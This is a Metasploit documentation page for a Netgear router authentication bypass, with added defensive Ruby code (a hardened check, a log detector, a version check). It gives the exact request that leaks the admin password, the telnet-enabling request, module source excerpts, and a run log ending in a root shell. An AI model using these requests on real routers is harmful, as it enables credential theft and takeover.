Netgear PNPX_GetShareFolderList Authentication Bypass - Metasploit


This page contains detailed information about how to use the auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Netgear PNPX_GetShareFolderList Authentication Bypass
Module: auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
Source code: modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
Disclosure date: 2021-09-06
Last modification time: 2022-10-03 19:50:04 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows unauthenticated attackers to reveal the password for the admin user that is used to log into the router's administrative portal, in plaintext. Once the password has been obtained, the exploit enables telnet on the target router and then utilizes the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the admin user. This will result in the attacker obtaining a new telnet session as the "root" user. This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • config-changes: Module modifies some configuration setting on the target machine.
  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


msf > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
msf auxiliary(netgear_pnpx_getsharefolderlist_auth_bypass) > show targets
    ... a list of targets ...
msf auxiliary(netgear_pnpx_getsharefolderlist_auth_bypass) > set TARGET target-id
msf auxiliary(netgear_pnpx_getsharefolderlist_auth_bypass) > show options
    ... show and set options ...
msf auxiliary(netgear_pnpx_getsharefolderlist_auth_bypass) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Intro

This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84.

Specifically, a call to strstr() is used to check if any incoming requests to authenticated pages contain the string todo=PNPX_GetShareFolderList anywhere within the request. If this string is found anywhere within the request, the request will be marked as an authenticated request, and will be treated as though it came from a logged in administrative user.

By using this vulnerability to send a request to /setup.cgi with the next_file GET parameter set to BRS_swisscom_success.html and an x GET parameter set to todo=PNPX_GetShareFolderList, an unauthenticated attacker can leak the plaintext versions of all of the router's WiFi passwords, as well as the admin username and plaintext admin password for the router.
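The two paragraphs above describe a substring match (strstr()) over the whole request standing in for a real authentication decision. The Ruby below is an added illustration, not code from the module or from the router firmware: vulnerable_authenticated? is a model of the described behaviour (the firmware's actual source is not on this page), and hardened_authenticated? is one assumed way a web server could scope such an exemption correctly, by parsing the request line and checking the actual value of the todo parameter on the one endpoint the exemption was meant for. The request lines are constructed samples.

```ruby
require 'uri'

# The marker the page says the firmware's strstr() call looks for.
MARKER = 'todo=PNPX_GetShareFolderList'.freeze

# Parse a query string into { name => [values] }; "x=todo=PNPX_..." yields
# name "x" with value "todo=PNPX_...", because only the first '=' splits.
def query_params(query)
  params = {}
  URI.decode_www_form(query.to_s).each { |k, v| (params[k] ||= []) << v }
  params
end

# Vulnerable logic, modelled on the page's description (a simulation, not the
# router's code): without a valid admin session, the request is still treated
# as authenticated if the marker appears anywhere in the raw request text.
def vulnerable_authenticated?(raw_request, has_valid_session: false)
  return true if has_valid_session
  raw_request.include?(MARKER)
end

# Hardened logic (assumed, not the vendor's fix): parse the request line and
# only exempt the exact endpoint and action; everything else needs a session.
def hardened_authenticated?(raw_request, has_valid_session: false)
  return true if has_valid_session
  method, target, _version = raw_request.split(' ', 3)
  return false unless method == 'GET' && target
  begin
    uri = URI.parse(target)
  rescue URI::InvalidURIError
    return false
  end
  return false unless uri.path == '/setup.cgi'
  params = query_params(uri.query)
  # The action must be the value of 'todo' itself, not a substring of some
  # other parameter, and no page selector (next_file) may ride along.
  params.fetch('todo', []) == ['PNPX_GetShareFolderList'] && !params.key?('next_file')
end

# Constructed request lines: a legitimate exempt request, the pattern the page
# describes, the marker smuggled on another page, and a plain protected page.
SAMPLE_REQUESTS = [
  'GET /setup.cgi?todo=PNPX_GetShareFolderList HTTP/1.1',
  'GET /setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList HTTP/1.1',
  'GET /top.html?junk=todo=PNPX_GetShareFolderList HTTP/1.1',
  'GET /top.html HTTP/1.1'
].freeze

# Run both checks over the samples and return the decisions side by side.
def compare(requests)
  requests.map do |req|
    { request: req,
      vulnerable: vulnerable_authenticated?(req),
      hardened: hardened_authenticated?(req) }
  end
end

if $PROGRAM_NAME == __FILE__
  puts format('%-10s %-10s %s', 'strstr', 'parsed', 'request')
  compare(SAMPLE_REQUESTS).each do |r|
    puts format('%-10s %-10s %s', r[:vulnerable], r[:hardened], r[:request])
  end
end
```

Only the first sample passes the parsed check; the substring check accepts the first three, which is exactly the gap the module exploits.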

Once the password has been obtained, the exploit enables telnet on the target router by sending a request to setup.cgi with the todo GET parameter set to debug. Once telnet has been enabled, it then utilizes the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the admin user. This will result in the attacker obtaining a new telnet session as the root user.
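The sequence just described leaves a distinctive trail in a web access log: the marker string carried in a parameter other than todo, followed from the same client by setup.cgi?todo=debug. The following detector is an added example (not part of the module or the page) that tags constructed common-log-format lines with those two indicators and correlates them per source address; the log lines and addresses are made up for the example and the field layout is assumed to be standard common log format.

```ruby
require 'uri'

# Constructed sample access-log lines (documentation IP ranges, not a real
# capture). Lines 1 and 3 reproduce the request pattern the page describes;
# line 4 carries the action in the expected parameter and must not be flagged.
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [23/Sep/2021:16:38:40 -0500] "GET /setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList HTTP/1.1" 200 5123
  192.0.2.10 - - [23/Sep/2021:16:38:41 -0500] "GET /top.html HTTP/1.1" 200 2048
  192.0.2.10 - - [23/Sep/2021:16:38:42 -0500] "GET /setup.cgi?todo=debug HTTP/1.1" 200 64
  198.51.100.7 - - [23/Sep/2021:16:40:00 -0500] "GET /setup.cgi?todo=PNPX_GetShareFolderList HTTP/1.1" 200 311
LOG

ACTION = 'PNPX_GetShareFolderList'.freeze
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# Parse a query string into { name => [values] }, splitting on the first '='.
def query_params(query)
  params = {}
  URI.decode_www_form(query.to_s).each { |k, v| (params[k] ||= []) << v }
  params
end

# Tag one log line with the indicators described on the page; nil if unparsable.
def classify(line)
  m = LINE_RE.match(line)
  return nil unless m
  begin
    uri = URI.parse(m[:target])
  rescue URI::InvalidURIError
    return nil
  end
  params = query_params(uri.query)
  tags = []
  # The action string inside any parameter other than todo (e.g. "x=todo=...")
  # only makes sense as an attempt to satisfy a substring check.
  smuggled = params.any? { |name, values| name != 'todo' && values.any? { |v| v.include?(ACTION) } }
  tags << 'pnpx_marker_smuggled' if smuggled
  # setup.cgi?todo=debug is the request the page says enables telnet.
  tags << 'debug_mode_requested' if uri.path == '/setup.cgi' && params.fetch('todo', []).include?('debug')
  { ip: m[:ip], ts: m[:ts], status: m[:status], target: m[:target], tags: tags }
end

# Flag lines, then correlate per client: a source that both smuggled the marker
# and requested debug mode matches the full leak-then-telnet chain.
def analyze(log_text)
  events = log_text.each_line.map { |l| classify(l.chomp) }.compact
  flagged = events.select { |e| e[:tags].any? }
  chains = flagged.group_by { |e| e[:ip] }.select do |_ip, evs|
    seen = evs.flat_map { |e| e[:tags] }
    seen.include?('pnpx_marker_smuggled') && seen.include?('debug_mode_requested')
  end
  { flagged: flagged, chained_sources: chains.keys }
end

if $PROGRAM_NAME == __FILE__
  result = analyze(SAMPLE_LOG)
  result[:flagged].each { |e| puts "#{e[:ts]} #{e[:ip]} #{e[:tags].join(',')} #{e[:target]}" }
  puts "full chain observed from: #{result[:chained_sources].join(', ')}"
end
```

The second indicator on its own is weak (an administrator with a real session can legitimately request debug mode), which is why the correlation requires both tags from the same source before calling it a chain.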

This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.

Affected Versions

  • AC2100 prior to firmware version 1.2.0.88
  • AC2400 prior to firmware version 1.2.0.88
  • AC2600 prior to firmware version 1.2.0.88
  • D7000 prior to firmware version 1.0.1.80
  • R6220 prior to firmware version 1.1.0.110
  • R6230 prior to firmware version 1.1.0.110
  • R6260 prior to firmware version 1.1.0.84
  • R6330 prior to firmware version 1.1.0.84
  • R6350 prior to firmware version 1.1.0.84
  • R6700v2 prior to firmware version 1.2.0.88
  • R6800 prior to firmware version 1.2.0.88
  • R6850 prior to firmware version 1.1.0.84
  • R6900v2 prior to firmware version 1.2.0.88
  • R7200 prior to firmware version 1.2.0.88
  • R7350 prior to firmware version 1.2.0.88
  • R7400 prior to firmware version 1.2.0.88
  • R7450 prior to firmware version 1.2.0.88
Verification Steps


  1. Start msfconsole
  2. Do: use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
  3. Do: set RHOSTS <RouterIP>
  4. Do: exploit
  5. Verify that you get a new telnet shell as the root user on the target router.

Scenarios


Netgear AC1600 aka R6260 with Firmware Version 1.1.0.40_1.0.1

            msf6 > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
            msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options
    
            Module options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):
    
            Name     Current Setting  Required  Description
            ----     ---------------  --------  -----------
            Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
            RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
                                            oit
            RPORT    80               yes       The target port (TCP)
            SSL      false            no        Negotiate SSL/TLS for outgoing connections
            VHOST                     no        HTTP server virtual host
    
            msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > set RHOSTS 192.168.1.1
            RHOSTS => 192.168.1.1
            msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > check
    
            [*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
            [*] 192.168.1.1:80 - The target appears to be vulnerable.
            msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > exploit
            [*] Running module against 192.168.1.1
    
            [*] Running automatic check ("set AutoCheck false" to disable)
            [*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
            [+] The target appears to be vulnerable.
            [*] Attempting to leak the password of the admin user...
            [+] Can log into target router using username admin and password theRiverOfNope123!
            [*] Attempting to retrieve /top.html to verify we are logged in!
            [*] Sending one request to grab authorization cookie from headers...
            [*] Got the authentication cookie, associating it with a logged in session...
            [+] Successfully logged into target router using the stolen credentials!
            [*] Attempting to store the stolen admin credentials for future use...
            [*] Enabling telnet on the target router...
            [+] Telnet enabled on target router!
            [*] Attempting to log in with admin:theRiverOfNope123!. You should get a new telnet session as the root user
            [*] Command shell session 1 opened (192.168.224.128:45717 -> 192.168.1.1:23) at 2021-09-23 16:38:53 -0500
            [*] Auxiliary module execution completed
            msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > sessions -i 1
            [*] Starting interaction with 1...
    
    
    
            # uname -a
            uname -a
            Linux R6260 2.6.36 #7 SMP Fri Jul 20 17:14:50 CST 2018 mips unknown
    
            # busybox
            busybox
            BusyBox v1.12.1 (2018-07-18 20:59:15 CST) multi-call binary
            Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko
            and others. Licensed under GPLv2.
            See source distribution for full notice.
    
            Usage: busybox [function] [arguments]...
            or: function [arguments]...
    
                    BusyBox is a multi-call binary that combines many common Unix
                    utilities into a single executable.  Most people will create a
                    link to busybox for each function they wish to use and BusyBox
                    will act like whatever it was invoked as!
    
            Currently defined functions:
                    [, [[, arp, ash, awk, basename, bunzip2, bzcat, cat, chmod, chpasswd,
                    cp, cut, date, dd, df, dmesg, echo, expr, false, fdisk, find, free,
                    ftpget, grep, gzip, halt, head, hexdump, hostname, ifconfig, init,
                    init, insmod, kill, killall, ln, login, ls, lsmod, md5sum, mdev,
                    mkdir, mknod, more, mount, mv, netstat, nice, passwd, pidof, ping,
                    ping6, poweroff, ps, pwd, reboot, renice, rm, rmmod, route, sed,
                    seq, sh, sleep, sync, tail, tar, taskset, telnetd, test, tftp,
                    time, top, touch, tr, traceroute, true, umount, uname, unzip, vconfig,
                    vi, wc, wget
    
            #
    


Msfconsole Usage


Here is how the admin/http/netgear_pnpx_getsharefolderlist_auth_bypass auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass

msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show info

       Name: Netgear PNPX_GetShareFolderList Authentication Bypass
     Module: auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2021-09-06

Provided by:
  Unknown
  Grant Willcox

Module side effects:
 config-changes
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Description:
  This module targets an authentication bypass vulnerability in the 
  mini_http binary of several Netgear Routers running firmware 
  versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The 
  vulnerability allows unauthenticated attackers to reveal the 
  password for the admin user that is used to log into the router's 
  administrative portal, in plaintext. Once the password has been been 
  obtained, the exploit enables telnet on the target router and then 
  utiltizes the auxiliary/scanner/telnet/telnet_login module to log 
  into the router using the stolen credentials of the admin user. This 
  will result in the attacker obtaining a new telnet session as the 
  "root" user. This vulnerability was discovered and exploited by an 
  independent security researcher who reported it to SSD.

References:
  https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133
  https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/

Module Options


This is a complete list of options available in the admin/http/netgear_pnpx_getsharefolderlist_auth_bypass auxiliary module:

msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options

Module options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the admin/http/netgear_pnpx_getsharefolderlist_auth_bypass auxiliary module:

msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show advanced

Module advanced options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):

   Name                  Current Setting                          Required  Description
   ----                  ---------------                          --------  -----------
   AutoCheck             true                                     no        Run check before exploit
   DOMAIN                WORKSTATION                              yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                     no        Conform to IIS, should work for most servers. Only set to false for non-
                                                                            IIS servers
   FingerprintCheck      true                                     no        Conduct a pre-exploit fingerprint verification
   ForceExploit          false                                    no        Override check result
   HttpClientTimeout                                              no        HTTP connection and receive timeout
   HttpPassword                                                   no        The HTTP password to specify for authentication
   HttpRawHeaders                                                 no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                    no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                  no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                    no        Show HTTP headers only in HttpTrace
   HttpUsername                                                   no        The HTTP username to specify for authentication
   SSLVersion            Auto                                     yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-
                                                                            negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Wind  no        The User-Agent header to use for all requests
                         ows NT 5.1)
   VERBOSE               false                                    no        Enable detailed status messages
   WORKSPACE                                                      no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/http/netgear_pnpx_getsharefolderlist_auth_bypass module can do:

msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the admin/http/netgear_pnpx_getsharefolderlist_auth_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache
                                                            )
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-n
                                                            ormal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Connection timed out.


Here is a relevant code snippet related to the "Connection timed out." error message:

53:	      'uri' => '/top.html',
54:	      'method' => 'GET'
55:	    )
56:	
57:	    if res.nil?
58:	      return Exploit::CheckCode::Unknown('Connection timed out.')
59:	    end
60:	
61:	    unless res.headers['WWW-Authenticate'] =~ /netgear/i
62:	      return Exploit::CheckCode::Safe('Target does not appear to be a Netgear router!')
63:	    end

Target does not appear to be a Netgear router!


Here is a relevant code snippet related to the "Target does not appear to be a Netgear router!" error message:

57:	    if res.nil?
58:	      return Exploit::CheckCode::Unknown('Connection timed out.')
59:	    end
60:	
61:	    unless res.headers['WWW-Authenticate'] =~ /netgear/i
62:	      return Exploit::CheckCode::Safe('Target does not appear to be a Netgear router!')
63:	    end
64:	
65:	    # Retrieve model name and firmware version
66:	    res = send_request_cgi({ 'uri' => '/currentsetting.htm' })
67:	    if res.nil?

Connection timed out.


Here is a relevant code snippet related to the "Connection timed out." error message:

63:	    end
64:	
65:	    # Retrieve model name and firmware version
66:	    res = send_request_cgi({ 'uri' => '/currentsetting.htm' })
67:	    if res.nil?
68:	      return Exploit::CheckCode::Unknown('Connection timed out.')
69:	    end
70:	
71:	    data = res.to_s
72:	    firmware_version = data.match(/^Firmware=V(\d+\.\d+\.\d+\.\d+)_(\d+\.\d+\.\d+)/)
73:	    if firmware_version.nil?

Could not retrieve firmware version!


Here is a relevant code snippet related to the "Could not retrieve firmware version!" error message:

69:	    end
70:	
71:	    data = res.to_s
72:	    firmware_version = data.match(/^Firmware=V(\d+\.\d+\.\d+\.\d+)_(\d+\.\d+\.\d+)/)
73:	    if firmware_version.nil?
74:	      return Exploit::CheckCode::Unknown('Could not retrieve firmware version!')
75:	    end
76:	
77:	    major_version = firmware_version[1]
78:	    minor_version = firmware_version[2]
79:	

Could not retrieve model of the router!


Here is a relevant code snippet related to the "Could not retrieve model of the router!" error message:

77:	    major_version = firmware_version[1]
78:	    minor_version = firmware_version[2]
79:	
80:	    model_name = data.match(/Model=([a-zA-Z0-9]+)/)
81:	    if model_name.nil?
82:	      return Exploit::CheckCode::Unknown('Could not retrieve model of the router!')
83:	    end
84:	
85:	    model_name = model_name[1]
86:	
87:	    # Check model is actually vulnerable

Not a vulnerable router model!


Here is a relevant code snippet related to the "Not a vulnerable router model!" error message:

85:	    model_name = model_name[1]
86:	
87:	    # Check model is actually vulnerable
88:	    vulnerable_router_models = ['AC2100', 'AC2400', 'AC2600', 'D7000', 'R6220', 'R6230', 'R6260', 'R6330', 'R6350', 'R6700v2', 'R6800', 'R6850', 'R6900v2', 'R7200', 'R7350', 'R7400', 'R7450']
89:	    unless vulnerable_router_models.include?(model_name)
90:	      return Exploit::CheckCode::Safe('Not a vulnerable router model!')
91:	    end
92:	
93:	    # Check version is vulnerable
94:	    print_status("Target is a #{model_name} router running firmware version #{major_version}_#{minor_version}")
95:	    if (Rex::Version.new(major_version) >= Rex::Version.new('1.2.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.2.0.88'))

Not a vulnerable router version!


Here is a relevant code snippet related to the "Not a vulnerable router version!" error message:

99:	    elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.1.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.1.0.110')) # Need more work on this as this isn't a good check for affected versions and may overlap with patched versions.
100:	      return Exploit::CheckCode::Appears
101:	    elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.1.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.1.0.84')) # Need more work on this to make sure we apply this to the correct systems.
102:	      return Exploit::CheckCode::Appears
103:	    else
104:	      return Exploit::CheckCode::Safe('Not a vulnerable router version!')
105:	    end
106:	  end
107:	
108:	  def run
109:	    print_status('Attempting to leak the password of the admin user...')
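The comments in the snippet above note that the 1.1.0.x branches overlap: a router fixed at 1.1.0.84 (for example an R6260) running 1.1.0.90 still falls under the "< 1.1.0.110" branch and is reported as Appears. The check below is an added example (not the module's code) of the per-model comparison the comments ask for: it keys the first-fixed version on the model name using the Affected Versions list on this page, and reuses the two regular expressions the module applies to /currentsetting.htm. Gem::Version from standard Ruby is assumed as a stand-in for Rex::Version, and the sample body is constructed in the layout those regexes expect, not captured from a device.

```ruby
require 'rubygems'

# First-fixed firmware per model, taken from the Affected Versions list.
FIXED_IN = {
  'AC2100' => '1.2.0.88', 'AC2400' => '1.2.0.88', 'AC2600' => '1.2.0.88',
  'D7000' => '1.0.1.80',
  'R6220' => '1.1.0.110', 'R6230' => '1.1.0.110',
  'R6260' => '1.1.0.84', 'R6330' => '1.1.0.84', 'R6350' => '1.1.0.84',
  'R6700v2' => '1.2.0.88', 'R6800' => '1.2.0.88', 'R6850' => '1.1.0.84',
  'R6900v2' => '1.2.0.88', 'R7200' => '1.2.0.88', 'R7350' => '1.2.0.88',
  'R7400' => '1.2.0.88', 'R7450' => '1.2.0.88'
}.freeze

# Same patterns the module's check applies to /currentsetting.htm.
FIRMWARE_RE = /^Firmware=V(\d+\.\d+\.\d+\.\d+)_(\d+\.\d+\.\d+)/
MODEL_RE = /Model=([a-zA-Z0-9]+)/

# Returns [model, major_version], or nil when either field is missing.
def parse_currentsetting(body)
  fw = body.match(FIRMWARE_RE)
  model = body.match(MODEL_RE)
  return nil if fw.nil? || model.nil?
  [model[1], fw[1]]
end

# :safe    -> model not in the list, or firmware at or after its fix
# :appears -> listed model running firmware older than its fix
# Gem::Version compares dotted numeric versions segment by segment, so
# 1.1.0.90 sorts after 1.1.0.84 and before 1.1.0.110 as intended.
def assess(model, major_version)
  fixed = FIXED_IN[model]
  return :safe unless fixed
  Gem::Version.new(major_version) < Gem::Version.new(fixed) ? :appears : :safe
end

# Convenience wrapper over a raw /currentsetting.htm body; :unknown if unparsable.
def assess_body(body)
  parsed = parse_currentsetting(body)
  return :unknown unless parsed
  assess(*parsed)
end

# Constructed body in the layout the regexes expect (not captured from a device).
SAMPLE_BODY = "Firmware=V1.1.0.40_1.0.1\nModel=R6260\n".freeze

if $PROGRAM_NAME == __FILE__
  puts "sample body           -> #{assess_body(SAMPLE_BODY)}"
  puts "R6260 at 1.1.0.90     -> #{assess('R6260', '1.1.0.90')} (range check in the module would say Appears)"
  puts "R6220 at 1.1.0.90     -> #{assess('R6220', '1.1.0.90')}"
  puts "D7000 at 1.0.1.80     -> #{assess('D7000', '1.0.1.80')}"
end
```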

Application did not respond with the expected admin username in its response!


Here is a relevant code snippet related to the "Application did not respond with the expected admin username in its response!" error message:

118:	
119:	    html_response = res.get_html_document
120:	    leaked_info_array = []
121:	    html_response.xpath('//div[@id="passpharse"]/following-sibling::div[@class="right_div"]').map { |node| leaked_info_array << node.text }
122:	    unless leaked_info_array.include?('admin')
123:	      fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin username in its response!')
124:	    end
125:	    wifi_password = leaked_info_array[0]
126:	    wifi_password_5g = leaked_info_array[1]
127:	    username = leaked_info_array[2]
128:	    password = leaked_info_array[3]

Application did not respond with an SSID in its response!


Here is a relevant code snippet related to the "Application did not respond with an SSID in its response!" error message:

127:	    username = leaked_info_array[2]
128:	    password = leaked_info_array[3]
129:	
130:	    network_names = html_response.xpath('//div[@id="network_name"]/following-sibling::div[@class="right_div"]')
131:	    if network_names.length < 2
132:	      print_warning('Application did not respond with an SSID in its response!')
133:	    else
134:	      wifi_ssid = network_names[1].text
135:	    end
136:	
137:	    network_names_5g = html_response.xpath('//div[@id="network_name_5G"]/following-sibling::div/child::text()')

Application did not respond with an 5G SSID in its response!


Here is a relevant code snippet related to the "Application did not respond with an 5G SSID in its response!" error message:

134:	      wifi_ssid = network_names[1].text
135:	    end
136:	
137:	    network_names_5g = html_response.xpath('//div[@id="network_name_5G"]/following-sibling::div/child::text()')
138:	    if network_names_5g.empty?
139:	      print_warning('Application did not respond with an 5G SSID in its response!')
140:	    else
141:	      wifi_ssid_5g = network_names_5g.text
142:	    end
143:	
144:	    if wifi_ssid_5g.empty? || wifi_password_5g.empty?

5G SSID information contained blank strings, skipping saving this info to the database!


Here is a relevant code snippet related to the "5G SSID information contained blank strings, skipping saving this info to the database!" error message:

140:	    else
141:	      wifi_ssid_5g = network_names_5g.text
142:	    end
143:	
144:	    if wifi_ssid_5g.empty? || wifi_password_5g.empty?
145:	      print_warning('5G SSID information contained blank strings, skipping saving this info to the database!')
146:	    else
147:	      # Create 5G WiFi credential
148:	      wifi_data_5g = {
149:	        origin_type: :import,
150:	        address: datastore['RHOST'],

SSID information contained blank strings, skipping saving this info to the database!


Here is a relevant code snippet related to the "SSID information contained blank strings, skipping saving this info to the database!" error message:

157:	      }
158:	      create_credential(wifi_data_5g)
159:	    end
160:	
161:	    if wifi_ssid.empty? || wifi_password.empty?
162:	      print_warning('SSID information contained blank strings, skipping saving this info to the database!')
163:	    else
164:	      # Create regular WiFi credential
165:	      wifi_data = {
166:	        origin_type: :import,
167:	        address: datastore['RHOST'],

Application responded with expected content, but the matched content was an empty string for some reason!


Here is a relevant code snippet related to the "Application responded with expected content, but the matched content was an empty string for some reason!" error message:

174:	      }
175:	      create_credential(wifi_data)
176:	    end
177:	
178:	    if username.empty? || password.empty?
179:	      fail_with(Failure::UnexpectedReply, 'Application responded with expected content, but the matched content was an empty string for some reason!')
180:	    end
181:	
182:	    print_good("Can log into target router using username #{username} and password #{password}")
183:	
184:	    print_status('Attempting to retrieve /top.html to verify we are logged in!')

Could not reach the target, something may have happened mid attempt!


Here is a relevant code snippet related to the "Could not reach the target, something may have happened mid attempt!" error message:

190:	      'method' => 'GET',
191:	      'keep_cookies' => 'true'
192:	    )
193:	
194:	    if res.nil?
195:	      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
196:	    end
197:	
198:	    if cookie_jar.empty?
199:	      fail_with(Failure::UnexpectedReply, "Router didn't respond with the expected Set-Cookie header to a response to /top.html!")
200:	    end

Here is a relevant code snippet related to the "Router didn't respond with the expected Set-Cookie header to a response to /top.html!" error message:

194:	    if res.nil?
195:	      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
196:	    end
197:	
198:	    if cookie_jar.empty?
